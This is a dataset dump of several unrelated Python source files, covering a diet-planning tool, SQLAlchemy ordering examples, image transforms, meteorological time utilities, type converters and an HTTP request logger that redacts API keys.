id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
6495548
|
import codecs
import copy
import pickle
import numpy as np
import console
import constants
import regression
np.random.seed(11)
# This is to pickle all foods in sorted order
def pickle_top_foods_for_each_nutrient(pickle_all_foods=True):
with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \
as nutrient_data_file:
nutrient_data = nutrient_data_file.read().split('\n')[1:]
if not pickle_all_foods:
nutrient_data = [x for x in nutrient_data if str(
int(x.split('^')[0])) in constants.SELECTED_FOOD_IDS]
nutrient_data = [x.split("^") for x in nutrient_data]
with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \
as nutrient_data_file:
mineral_desc = nutrient_data_file.read().split('\n')[0] \
.split('^')[constants.NUTRIENT_START_INDEX:-1]
nutrient_data = np.array([x for x in nutrient_data])
nutrient_data = np.concatenate(
(
nutrient_data[:, 0:1],
nutrient_data[:, constants.NUTRIENT_START_INDEX:-1]
),
axis=1
)
nutrient_data[nutrient_data == ''] = '0'
nutrient_data = nutrient_data.astype("float")
dict_li = []
for i in range(1, 150):
temp = nutrient_data[nutrient_data[:, i].argsort()[::-1]]
dict_li.append(
str(i) + ':' + "('" + mineral_desc[
i - 1] + "_TopFoods',[" + ",".join(
'"{0}"'.format(w) for w in
temp[:temp.shape[0], [0]].astype('str').reshape(
temp.shape[0]).tolist()) + '])')
top_nutritious_food = ','.join(dict_li)
nutrient_wise_top_foods = eval('{' + top_nutritious_food + '}')
if pickle_all_foods:
with open(constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE,
'wb') as pickle_file:
pickle.dump(nutrient_wise_top_foods, pickle_file)
else:
with open(constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE,
'wb') as pickle_file:
pickle.dump(nutrient_wise_top_foods, pickle_file)
def build_x_and_y(input_food_list, duplicate_sample_count, daily_limit_list,
req_mineral_list):
avg = sum(daily_limit_list) / len(daily_limit_list)
normalize_list = [avg / x if x > 0 else 1 for x in daily_limit_list]
daily_limit_list = [
normalize_list[i] * daily_limit_list[i]
for i in range(len(normalize_list))
]
with codecs.open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='utf-8',
errors='ignore') as data:
food_items = data.read().split('\n')[1:]
food_items = [food_item.split("^") for food_item in food_items]
food_dict = {}
[food_dict.update({str(int(food_item[0])): food_item}) for food_item in
food_items]
x = np.array(
[[[z * float(food_dict[x][y]) * (float(constants.GRAMS)) / 100 for y in
[x1 + constants.NUTRIENT_START_INDEX for x1 in
req_mineral_list]] for x in input_food_list] for z in
range(1, duplicate_sample_count + 1)])
x = x * normalize_list
y = np.array([[x * m for x in daily_limit_list] for m in
range(1, duplicate_sample_count + 1)])
return x, y, normalize_list
def get_top_foods_for_nutrient(all_foods, index, length):
if all_foods:
nutrient_wise_top_foods = pickle.load(
open(constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE, 'rb'))
else:
nutrient_wise_top_foods = pickle.load(
open(constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE, 'rb'))
return (
nutrient_wise_top_foods[index + 1][0],
[
str(int(float(x)))
for x in nutrient_wise_top_foods[index + 1][1][:length + 1]
]
)
def get_add_more_list(x, y, theta):
dt_product = regression.dot_product(x, theta)
# required = y[0]
# computed_total = dt_product[0]
ratio = (y / dt_product).tolist()[0]
difference = (y - dt_product).tolist()[0]
add_more_list = []
for i in range(len(ratio)):
if ratio[i] > 2 or difference[i] > 50:
add_more_list.append(i)
return [constants.REQUIRED_NUTRIENT_LIST[x] for x in add_more_list]
def get_remove_existing_foods_list(x, y, theta):
dt_product = regression.dot_product(x, theta)
# required = y[0]
# computed_total = dt_product[0]
ratio = (y / dt_product).tolist()[0]
difference = (y - dt_product).tolist()[0]
remove_existing = []
for i in range(len(ratio)):
if ratio[i] < 0.5 or difference[i] < (-50):
remove_existing.append(i)
return [constants.REQUIRED_NUTRIENT_LIST[x] for x in remove_existing]
def show_add_more_foods(nutrient_top_foods_dict, final_foods):
loop = True
while loop:
loop_1 = True
print("Added extra Foods for todays Meal:")
for i in nutrient_top_foods_dict.keys():
print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join(
nutrient_top_foods_dict[i][1]))
print(
"\nselect nutrients that you need to add, "
"Please enter the number associated with nutrient"
)
for i in nutrient_top_foods_dict.keys():
print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0])
print("\t# to exit application")
try:
nutrient_key = int(input())
if nutrient_key in nutrient_top_foods_dict.keys():
while loop_1:
console.show_products(nutrient_top_foods_dict[nutrient_key]
[2])
food_list = nutrient_top_foods_dict[nutrient_key][2]
food_key = int(input())
if food_key in range(1, len(food_list) + 1):
nutrient_top_foods_dict[nutrient_key][1].append(
nutrient_top_foods_dict[nutrient_key][2][
food_key].split('^')[1].replace(',', '')[:25])
final_foods.append(
nutrient_top_foods_dict[nutrient_key][2][
food_key].split('^')[0])
else:
loop_1 = False
except Exception as e:
loop = False
print(
"You chose to exit or gave wrong Input, "
"Thank you for using this Application"
+ str(e)
)
return final_foods
def show_delete_foods(nutrient_top_foods_dict, final_foods):
loop = True
while loop:
loop_1 = True
print("Foods That need to be removed:")
print(final_foods)
for i in nutrient_top_foods_dict.keys():
print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join(
nutrient_top_foods_dict[i][1]))
print(
"\nselect nutrients that you need to remove, "
"Please enter the number associated with nutrient"
)
for i in nutrient_top_foods_dict.keys():
print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0])
print("\t# to exit application")
try:
nutrient_key = int(input())
if nutrient_key in nutrient_top_foods_dict.keys():
while loop_1:
console.show_products(
nutrient_top_foods_dict[nutrient_key][2]
)
food_list = nutrient_top_foods_dict[nutrient_key][2]
food_key = int(input())
if food_key in range(1, len(food_list) + 1):
nutrient_top_foods_dict[nutrient_key][1].append(
nutrient_top_foods_dict[nutrient_key][2][
food_key].split('^')[1].replace(',', '')[:25])
final_foods.append(
nutrient_top_foods_dict[nutrient_key][2][
food_key].split('^')[0])
else:
loop_1 = False
except ValueError:
loop = False
print(
"You chose to exit or gave wrong Input, "
"Thank you for using this Application"
)
return list(set(final_foods))
def add_more_foods(add_more_list, final_foods):
nutrient_top_foods_dict = {}
with open(constants.NUTRIENT_DETAILS_FILE, 'r',
encoding='ISO-8859-1') as nutrient_details_file:
food_items = nutrient_details_file.read().split('\n')[1:]
# food_items = open(constants.NUTRIENT_DETAILS_FILE).read().split('\n')[1:]
food_items = [food_item.split("^") for food_item in food_items]
food_dict = {}
[food_dict.update({str(int(food_item[0])): food_item}) for food_item in
food_items]
for i in range(len(add_more_list)):
top_list = [
x for
x in get_top_foods_for_nutrient(False, add_more_list[i], 50)[1]
if x not in final_foods
]
dictt = {i: top_list[i - 1] + '^' + food_dict[top_list[i - 1]][4] for i
in range(1, len(top_list) + 1)}
nutrient_top_foods_dict.update(
{i + 1: (constants.NUTRIENT_LIST[add_more_list[i]], [], dictt)})
final_foods = show_add_more_foods(nutrient_top_foods_dict, final_foods)
return final_foods
def removeExistingFoods(remove_existing_list, final_foods):
nutrient_top_foods_dict = {}
with open(constants.NUTRIENT_DETAILS_FILE, 'r',
encoding='ISO-8859-1') as nutrient_details_file:
food_items = nutrient_details_file.read().split('\n')[1:]
# food_items = open(constants.NUTRIENT_DETAILS_FILE).read().split('\n')[1:]
food_items = [food_item.split("^") for food_item in food_items]
food_dict = {}
[food_dict.update({str(int(food_item[0])): food_item}) for food_item in
food_items]
for i in range(len(remove_existing_list)):
top_list = [
x
for x in get_top_foods_for_nutrient(
False,
remove_existing_list[i], 300
)[1]
if x in final_foods
]
dictt = {i: top_list[i - 1] + '^' + food_dict[top_list[i - 1]][4] for i
in range(1, len(top_list) + 1)}
nutrient_top_foods_dict.update({i + 1: (
constants.NUTRIENT_LIST[remove_existing_list[i]], [], dictt)})
remove_foods = show_delete_foods(nutrient_top_foods_dict, [])
return remove_foods
def add_or_remove_foods(x, y, theta, final_foods):
print(
"Please analyse the output in " + constants.OUTPUT_FILE
+ "\n"
+ "Select one of the below items"
+ "\n\n\t"
+ "1 For Adding a Food yourself"
+ "\n\t"
+ "2 for Adding system analysed Foods"
+ "\n\t"
+ "3 for Removing a food item"
+ "\n\t"
+ "4 for Removing system analysed Foods"
+ "\n\t"
+ "5 for removing Zero weight foods"
+ "\n\t"
+ "6 for Running with specific Iterations"
+ "\n\t"
+ "# To Continue with previous items"
)
try:
option = int(input())
if option == 1:
print(
"Enter the comma separated food item IDs "
"that needed to be added. "
"for example\n\t11080,11215"
)
new_foods = [
x.strip()
for x in input().strip().split(',')
if x not in final_foods
]
if len(new_foods) > 0:
append_theta = np.array(
[[i] * x.shape[2] for i in np.random.rand(len(new_foods))]
)
theta = np.concatenate((theta, append_theta), axis=0)
final_foods = final_foods + new_foods
return final_foods, theta, 0
else:
print("No food item to add")
return None
elif option == 2:
if get_add_more_list(x, y, theta):
initial_copy = copy.deepcopy(final_foods)
final_foods = add_more_foods(get_add_more_list(x, y, theta),
final_foods)
if len(final_foods) - len(initial_copy) > 0:
append_theta = np.array(
[
[i] * x.shape[2]
for i in
np.random.rand(len(final_foods)
- len(initial_copy))
]
)
theta = np.concatenate((theta, append_theta), axis=0)
return final_foods, theta, 0
else:
print("No food items to Add based on Analysis")
return None
elif option == 3:
print(
"Enter the comma separated food "
"item IDs that needed to be deleted."
"for example\n\t11080,11215"
)
remove_foods = list(
set(
[x.strip() for x in str(input()).strip().split(',') if
x in final_foods]
)
)
if len(remove_foods) > 0:
for food in remove_foods:
indx = final_foods.index(food)
final_foods.remove(food)
theta = np.delete(theta, indx, axis=0)
return final_foods, theta, 0
else:
print("No food items to delete")
return None
elif option == 4:
if get_remove_existing_foods_list(x, y, theta):
remove_foods = removeExistingFoods(
get_remove_existing_foods_list(x, y, theta),
final_foods
)
if len(remove_foods) > 0:
for food in remove_foods:
indx = final_foods.index(food)
final_foods.remove(food)
theta = np.delete(theta, indx, axis=0)
return final_foods, theta, 0
else:
print("No food items to delete based on Analysis")
return None
elif option == 5:
while True:
theta_list = theta[:, 0].tolist()
try:
indx = theta_list.index(0.0)
food = final_foods[indx]
final_foods.remove(food)
theta = np.delete(theta, indx, axis=0)
except Exception as e:
print("Exception" + str(e))
break
return final_foods, theta, 0
elif option == 6:
print("Enter the reqired iterations")
iters = int(input())
if iters > 0:
return final_foods, theta, iters
else:
return final_foods, theta, 0
else:
print("Invalid option. Thanks for suing this Application.")
return None
except Exception as e:
print(
"You chose to exit or gave wrong Input, "
"Thank you for using this Application\nThe exception is \n"
+ str(e)
)
return final_foods, theta, 0
|
StarcoderdataPython
|
6700735
|
<gh_stars>0
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, DATETIME
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship, backref
from datetime import datetime
import time
# TODO: db_uri
# dialect+driver://username:password@host:port/database?charset=utf8
DB_URI = 'mysql+pymysql://root:[email protected]:3300/first_sqlalchemy?charset=utf8'
engine = create_engine(DB_URI)
Base = declarative_base(bind=engine)
session = sessionmaker(bind=engine)()
# TODO: 定义User模型
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(50), nullable=False)
create_time = Column(DATETIME, nullable=False, default=datetime.now)
def __repr__(self):
return '<User(id={id}, name={name}, create_time={create_time})>'.format(id=self.id, name=self.name,
create_time=self.create_time)
# TODO: 定义Article模型
class Article(Base):
__tablename__ = 'article'
id = Column(Integer, primary_key=True, autoincrement=True)
title = Column(String(50), nullable=False)
create_time = Column(DATETIME, nullable=False, default=datetime.now)
uid = Column(Integer, ForeignKey('user.id'))
# TODO: 在模型中定义relationship的order_by参数: 正序
# authors = relationship('User', backref=backref('articles', order_by=create_time))
# TODO: 在模型中定义relationship的order_by参数: 倒序
# authors = relationship('User', backref=backref('articles', order_by=create_time.desc()))
authors = relationship('User', backref=backref('articles'))
# TODO: 3.在模型中定义__mapper_args__: 正序
# __mapper_args__ = {
# 'order_by': create_time
# }
# TODO: 3.在模型中定义__mapper_args__: 倒序
__mapper_args__ = {
'order_by': create_time.desc()
}
def __repr__(self):
return '<Article(id=%s, title=%s, create_time=%s)>' % (self.id, self.title, self.create_time)
# TODO: 删除数据表
# Base.metadata.drop_all()
# TODO: 创建数据表
# Base.metadata.create_all()
# TODO: 新增数据
# user = User(name='zhiliao')
# article1 = Article(title='python')
# user.articles.append(article1)
# session.add(user)
# session.commit()
#
# time.sleep(2)
#
# article2 = Article(title='flask')
# user.articles.append(article2)
# session.add(user)
# session.commit()
#
# time.sleep(2)
#
# article3 = Article(title='django')
# user.articles.append(article3)
# session.add(user)
# session.commit()
# TODO: 1.order_by
# TODO: 1.1 正序排序
# articles = session.query(Article).order_by(Article.create_time).all()
# articles = session.query(Article).order_by('create_time').all()
# print(articles)
# TODO: 1.2 倒序排序
# articles = session.query(Article).order_by(Article.create_time.desc()).all()
# articles = session.query(Article).order_by('-create_time').all()
# print(articles)
# TODO: 2.在模型中定义relationship的order_by参数
# TODO: 2.1 正序排序
# TODO: 2.2 倒序排序
# TODO: 3.在模型中定义__mapper_args__
# TODO: 3.1 正序排序
# TODO: 3.2 倒序排序
users = session.query(User).first()
print(users.articles)
|
StarcoderdataPython
|
6492641
|
<reponame>NateThom/contrastive_learning
import torch
import torchvision.transforms.functional as TF
import torchvision.transforms as T
class MyRandomColorJitter(object):
"""Crop randomly the image and masks in a sample
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self):
self.jitter = T.ColorJitter(0.8, 0.8, 0.8, 0.2)
def __call__(self, sample):
image = sample["image"]
jitter_probability = torch.rand(1)
if jitter_probability[0] > 0.5:
image = self.jitter(image)
if "image2" in sample:
image2 = sample["image2"]
jitter_probability = torch.rand(1)
if jitter_probability[0] > 0.5:
image2 = self.jitter(image2)
return {'image': image, 'image2': image2, 'label': sample['label']}
return {'image': image, 'label': sample['label']}
|
StarcoderdataPython
|
5184818
|
<reponame>harshal306/radiometric_normalization
'''
Copyright 2015 Planet Labs, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy
def pixel_list_to_array(pixel_locations, shape):
''' Transforms a list of pixel locations into a 2D array.
:param tuple pixel_locations: A tuple of two lists representing the x and y
coordinates of the locations of a set of pixels (i.e. the output of
numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array
representing the pixel locations)
:param list active_pixels: A list the same length as the x and y coordinate
lists within pixel_locations representing whether a pixel location
should be represented in the mask or not
:param tuple shape: The shape of the output array consisting of a tuple
of (height, width)
:returns: A 2-D boolean array representing active pixels
'''
mask = numpy.zeros(shape, dtype=numpy.bool)
mask[pixel_locations] = True
return mask
def trim_pixel_list(pixel_locations, active_pixels):
''' Trims the list of pixel locations to only the active pixels.
:param tuple pixel_locations: A tuple of two lists representing the x and y
coordinates of the locations of a set of pixels (i.e. the output of
numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array
representing the pixel locations)
:param list active_pixels: A list the same length as the x and y coordinate
lists within pixel_locations representing whether a pixel location
should be represented in the mask or not
:returns: A tuple of two lists representing the x and y coordinates of the
locations of active pixels
'''
active_pixels = numpy.nonzero(active_pixels)[0]
return (pixel_locations[0][active_pixels],
pixel_locations[1][active_pixels])
def combine_valid_pixel_arrays(list_of_pixel_arrays):
''' Combines a list of 2D boolean pixel arrays that represent locations of
valid pixels with only the pixels that are common in all bands.
:param list list_of_pixel_arrays: A list of 2D boolean arrays representing
the valid pixel locations
:returns: A 2D boolean array representing common valid pixels
'''
return numpy.logical_and.reduce(list_of_pixel_arrays)
def combine_valid_pixel_lists(list_of_pixel_locations):
''' Combines a list of valid pixel x and y locations (for a 2D array) with
only the pixels that are in common in all bands.
:param list list_of_pixel_locations: A list of tuples that contain two
lists representing the x and y coordinates of the locations of valid
pixels (i.e. the output of numpy.nonzero(valid_pixels) where
valid_pixels is a 2D boolean array representing the valid pixel
locations)
:returns: A 2D boolean array representing common valid pixels
'''
max_x = max([max(l[0]) for l in list_of_pixel_locations])
max_y = max([max(l[1]) for l in list_of_pixel_locations])
shape = (max_x + 1, max_y + 1)
list_of_pixel_arrays = [pixel_list_to_array(p, shape) for p in
list_of_pixel_locations]
return numpy.nonzero(combine_valid_pixel_arrays(list_of_pixel_arrays))
|
StarcoderdataPython
|
40784
|
"""doufo.convert
abstract class of `dataType` converters.
Example:
Todo:
Author:
"""
from .function import func
from functools import wraps, cmp_to_key
from multipledispatch import Dispatcher
from typing import Callable, TypeVar
__all__ = ['converters', 'convert_to', 'convert']
T = TypeVar('T')
B = TypeVar('B')
class ConvertersDict:
"""doufo.ConverterDict: to define dictionary-like class to store converters.
Note, this class is hidden, and been used as `converters`
Attributes:
`attr1` (type): Description
"""
def __init__(self):
"""initial as a empty `dictionary`"""
self.converters = {}
def sorted_converters_keys(self):
"""doufo.ConvertDict().sorted_converters_key: sort converter keys
sort key according to their relationship (if parent- and child-class)
or their hash value.
Args:
`self`
"""
keys = sorted(self.converters.keys(),
key=cmp_to_key(tuple_type_compare))
return {k: self.converters[k] for k in keys}
def register(self, src: type, tar: type) -> Callable[[T], B]:
"""doufo.ConverterDict().register(): A decorator factory to define typing converting decorator
Attributes:
`self`
`src` (`type`): source `type`,
`tar` (`type`): target `type`,
Returns:
`f` (`Callable[[T], B]`): a decorater that defines a converter
"""
def deco(f):
self.converters[(src, tar)] = f
self.converters = self.sorted_converters_keys()
return f
return deco
def convert(self, src: type, tar: type) -> Callable[[T], B]:
""" doufo.ConvertDict().convert: define a converter from `type src` to `type tar`
Attibutes:
`self`
`src` (`type`): source `type`,
`tar` (`type`): target `type`,
Returns:
`converter` (`Callable[[T], B]`): converter from `type src` to `type tar`
"""
return self.converters[(src, tar)]
converters = ConvertersDict()
@func()
def convert_to(o, target_type):
"""doufo.convert_to: convert forward
Args:
`o` (`A`): any object
`target_type` (`type`): destination type
Returns:
return (`target_type`):description: object `o` in type of `target_type`
Raises:
"""
return converters.convert(type(o), target_type)(o)
@func()
def convert(o, target_type):
"""doufo.convert: convert backwards
Args:
`o` (`A`): any object
`target_type` (`type`): destination type
Returns:
return (`target_type`):description: object `o` in type of `target_type`
Raises:
"""
return converters.convert(type(o), target_type)(o)
def tuple_type_compare(types0, types1):
"""doufo.tuple_type_compare: compare two types
if `types0` is 'bigger' than `types1`, return negative (<0);
otherwise, return positive (>0). Here 'bigger' is defined by
whether they are 'parent and child', or ituitively bigger
Args:
types0 (`type`): types0
types1 (`type`): types1
Returns:
return (`int`): comparison results
Raises:
"""
compares = [single_type_compare(types0[0], types1[0]),
single_type_compare(types0[1], types1[1])]
if compares[0] != 0:
return compares[0]
if compares[1] != 0:
return compares[1]
if types0[0] is types1[0] and types0[1] is types1[1]:
return 0
return hash(types1) - hash(types0)
def single_type_compare(t0, t1):
if t0 is t1:
return 0
if issubclass(t0, t1):
return 1
if issubclass(t1, t0):
return -1
return 0
|
StarcoderdataPython
|
1953455
|
<filename>Conversor de bases numericas.py
num = int(input('Informe um número para a conversão: '))
print('Digite 1 para BINÁRIO')
print('Digite 2 para OCTAL')
print('Digite 3 para HEXADECIMAL')
base = int(input('Escolha a base numérica: '))
if base == 1:
print('{} em BINÁRIO é igual a {}'.format(num, bin(num)[2:]))
elif base == 2:
print('{} em OCTAL é igual a {}'.format(num, oct(num)[2:]))
elif base == 3:
print('{} em HEXADECIMAL é igual a {}'.format(num, hex(num)[2:]))
else:
print('valor inválido!')
|
StarcoderdataPython
|
4955390
|
<filename>improver/utilities/temporal.py
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2019 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""General utilities for parsing and extracting cubes at times"""
import warnings
from datetime import datetime, timezone
import cf_units
import iris
import numpy as np
from iris import Constraint
from iris.time import PartialDateTime
def cycletime_to_datetime(cycletime, cycletime_format="%Y%m%dT%H%MZ"):
"""Convert a string representating the cycletime of the
format YYYYMMDDTHHMMZ into a datetime object.
Args:
cycletime (str):
A cycletime that can be converted into a datetime using the
cycletime_format supplied.
cycletime_format (str):
String containing the desired format for the cycletime.
Returns:
datetime:
A correctly formatted datetime object.
"""
return datetime.strptime(cycletime, cycletime_format)
def datetime_to_cycletime(adatetime, cycletime_format="%Y%m%dT%H%MZ"):
"""Convert a datetime object into a string representing the cycletime
of the format YYYYMMDDTHHMMZ.
Args:
adatetime (datetime.datetime):
A datetime that can be converted into a cycletime using the
cycletime_format supplied.
cycletime_format (str):
String containing the desired format for the cycletime.
Returns:
str:
A correctly formatted string.
"""
return datetime.strftime(adatetime, cycletime_format)
def cycletime_to_number(
cycletime,
cycletime_format="%Y%m%dT%H%MZ",
time_unit="hours since 1970-01-01 00:00:00",
calendar="gregorian",
):
"""Convert a cycletime of the format YYYYMMDDTHHMMZ into a numeric
time value.
Args:
cycletime (str):
A cycletime that can be converted into a datetime using the
cycletime_format supplied.
cycletime_format (str):
String containg the appropriate directives to indicate how
the output datetime should display.
time_unit (str):
String representation of the cycletime units.
calendar (str):
String describing the calendar used for defining the cycletime.
The choice of calendar must be supported by cf_units.CALENDARS.
Returns:
float:
A numeric value to represent the datetime using assumed choices
for the unit of time and the calendar.
"""
dtval = cycletime_to_datetime(cycletime, cycletime_format=cycletime_format)
return cf_units.date2num(dtval, time_unit, calendar)
def iris_time_to_datetime(time_coord, point_or_bound="point"):
"""
Convert iris time to python datetime object. Working in UTC.
Args:
time_coord (iris.coords.Coord):
Iris time coordinate element(s).
Returns:
list of datetime.datetime:
The time element(s) recast as a python datetime object.
"""
coord = time_coord.copy()
coord.convert_units("seconds since 1970-01-01 00:00:00")
if point_or_bound == "point":
datetime_list = [value.point for value in coord.cells()]
elif point_or_bound == "bound":
datetime_list = [value.bound for value in coord.cells()]
return datetime_list
def datetime_to_iris_time(dt_in):
"""
Convert python datetime.datetime into seconds since 1970-01-01 00Z.
Args:
dt_in (datetime.datetime):
Time to be converted into seconds since 1970-01-01 00Z.
Returns:
float:
Time since epoch in the seconds as desired dtype.
"""
result = dt_in.replace(tzinfo=timezone.utc).timestamp()
return np.int64(result)
def datetime_constraint(time_in, time_max=None):
"""
Constructs an iris equivalence constraint from a python datetime object.
Args:
time_in (datetime.datetime):
The time to be used to build an iris constraint.
time_max (datetime.datetime):
Optional max time, which if provided leads to a range constraint
being returned up to < time_max.
Returns:
iris.Constraint:
An iris constraint to be used in extracting data at the given time
from a cube.
"""
time_start = PartialDateTime(time_in.year, time_in.month, time_in.day, time_in.hour)
if time_max is None:
time_extract = Constraint(time=lambda cell: cell.point == time_start)
else:
time_limit = PartialDateTime(
time_max.year, time_max.month, time_max.day, time_max.hour
)
time_extract = Constraint(time=lambda cell: time_start <= cell < time_limit)
return time_extract
def extract_cube_at_time(cubes, time, time_extract):
"""
Extract a single cube at a given time from a cubelist.
Args:
cubes (iris.cube.CubeList):
CubeList of a given diagnostic over several times.
time (datetime.datetime object):
Time at which forecast data is needed.
time_extract (iris.Constraint):
Iris constraint for the desired time.
Returns:
iris.cube.Cube:
Cube of data at the desired time.
Raises:
ValueError if the desired time is not available within the cubelist.
"""
try:
(cube_in,) = cubes.extract(time_extract)
return cube_in
except ValueError:
msg = "Forecast time {} not found within data cubes.".format(
time.strftime("%Y-%m-%d:%H:%M")
)
warnings.warn(msg)
return None
def extract_nearest_time_point(cube, dt, time_name="time", allowed_dt_difference=0):
"""Find the nearest time point to the time point provided.
Args:
cube (iris.cube.Cube):
Cube or CubeList that will be extracted from using the supplied
time_point
dt (datetime.datetime):
Datetime representation of a time that will be used within the
extraction from the cube supplied.
time_name (str):
Name of the "time" coordinate that will be extracted. This must be
"time" or "forecast_reference_time".
allowed_dt_difference (int):
An int in seconds to define a limit to the maximum difference
between the datetime provided and the time points available within
the cube. If this limit is exceeded, then an error is raised.
This must be defined in seconds.
Default is 0.
Returns:
iris.cube.Cube:
Cube following extraction to return the cube that is nearest
to the time point supplied.
Raises:
ValueError: The requested datetime is not available within the
allowed difference.
"""
if time_name not in ["time", "forecast_reference_time"]:
msg = (
"{} is not a valid time_name. "
"The time_name must be either "
"'time' or 'forecast_reference_time'."
)
raise ValueError(msg)
time_point = datetime_to_iris_time(dt)
time_point_index = cube.coord(time_name).nearest_neighbour_index(time_point)
(nearest_dt,) = iris_time_to_datetime(
cube.coord(time_name).copy()[time_point_index]
)
if abs((dt - nearest_dt).total_seconds()) > allowed_dt_difference:
msg = (
"The datetime {} is not available within the input "
"cube within the allowed difference {} seconds. "
"The nearest datetime available was {}".format(
dt, allowed_dt_difference, nearest_dt
)
)
raise ValueError(msg)
constr = iris.Constraint(coord_values={time_name: nearest_dt})
cube = cube.extract(constr)
return cube
|
StarcoderdataPython
|
3372793
|
<gh_stars>0
import json
from logzio.handler import LogzioHandler
class ExtensionLogHandler(LogzioHandler):
def __init__(self, *args, **kwargs):
self.default_extra_fields = kwargs.pop('default_extra_fields')
super().__init__(*args, **kwargs)
def extra_fields(self, message):
extra_fields = super().extra_fields(message)
extra_fields.update(self.default_extra_fields)
return extra_fields
class RequestLogger:
def __init__(self, logger):
self.logger = logger
def obfuscate(self, value):
if value.startswith('ApiKey SU-'):
return value.split(':')[0] + ':' + '*' * 10
else:
return '*' * 20
def log_request(self, method, url, kwargs):
other_args = {k: v for k, v in kwargs.items() if k not in ('headers', 'json', 'params')}
if 'params' in kwargs:
url += '&' if '?' in url else '?'
url += '&'.join([f'{k}={v}' for k, v in kwargs['params'].items()])
lines = [
'--- HTTP Request ---',
f'{method.upper()} {url} {other_args if other_args else ""}',
]
if 'headers' in kwargs:
for k, v in kwargs['headers'].items():
if k.lower() == 'authorization':
v = self.obfuscate(v)
lines.append(f'{k}: {v}')
if 'json' in kwargs:
lines.append(json.dumps(kwargs['json'], indent=4))
lines.append('')
self.logger.debug('\n'.join(lines))
def log_response(self, response):
reason = response.raw.reason if getattr(response, 'raw', None) else response.reason_phrase
lines = [
'--- HTTP Response ---',
f'{response.status_code} {reason}',
]
for k, v in response.headers.items():
lines.append(f'{k}: {v}')
if response.headers.get('Content-Type', None) == 'application/json':
lines.append(json.dumps(response.json(), indent=4))
lines.append('')
self.logger.debug('\n'.join(lines))
|
StarcoderdataPython
|
6624677
|
<filename>src/pyast_utils.py
# Copyright (c) 2019, IBM Research.
#
# Author: <NAME> <<EMAIL>>
#
# vim: set expandtab softtabstop=4 tabstop=4 shiftwidth=4:
import itertools
import copy
import ast as pyast
class StructureTupleYields(pyast.NodeTransformer):
""" AST transformer for "structuring" yielded tuples
For example, if structure is (2,3), then a yield expression, yielding a
5-tuple: yield (a,b,c,d,e) will be transformed to yield ((a,b,),(c,d,e)).
"""
def __init__(self, structure):
super().__init__()
self.structure = structure
def visit_Yield(self, node):
# This yield is not a tuple, do nothing
if not isinstance(node.value, pyast.Tuple):
print(
"*" * 10,
"Yiedling something which is not a tuple. Doing nothing",
)
return node
elts = node.value.elts
ctx = node.value.ctx
nelts = len(elts)
if nelts != sum(self.structure):
print(
"*" * 10,
"Yiedling a tuple with size=%d while structure=%s. Doing nothing."
% (nelts, structure),
)
return node
new_elts = []
elts_iter = iter(elts)
for n in self.structure:
xelts = [x for x in itertools.islice(elts_iter, n)]
xtuple = pyast.Tuple(xelts, copy.copy(ctx))
new_elts.append(xtuple)
# sanity check that there are no more elements in the iterator
# (they shouldn't be since we checked the length)
try:
next(elts_iter)
assert False
except StopIteration:
pass
new_node = pyast.Yield(pyast.Tuple(new_elts, copy.copy(ctx)))
return pyast.copy_location(new_node, node)
|
StarcoderdataPython
|
6452724
|
"""Directory structure and paths."""
import platform
from pathlib import Path
URL = {
0: 'http://s3.eu-central-1.amazonaws.com/boo2012/data_reference.rar',
2012: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2012/data-20181029t000000-structure-20121231t000000.csv',
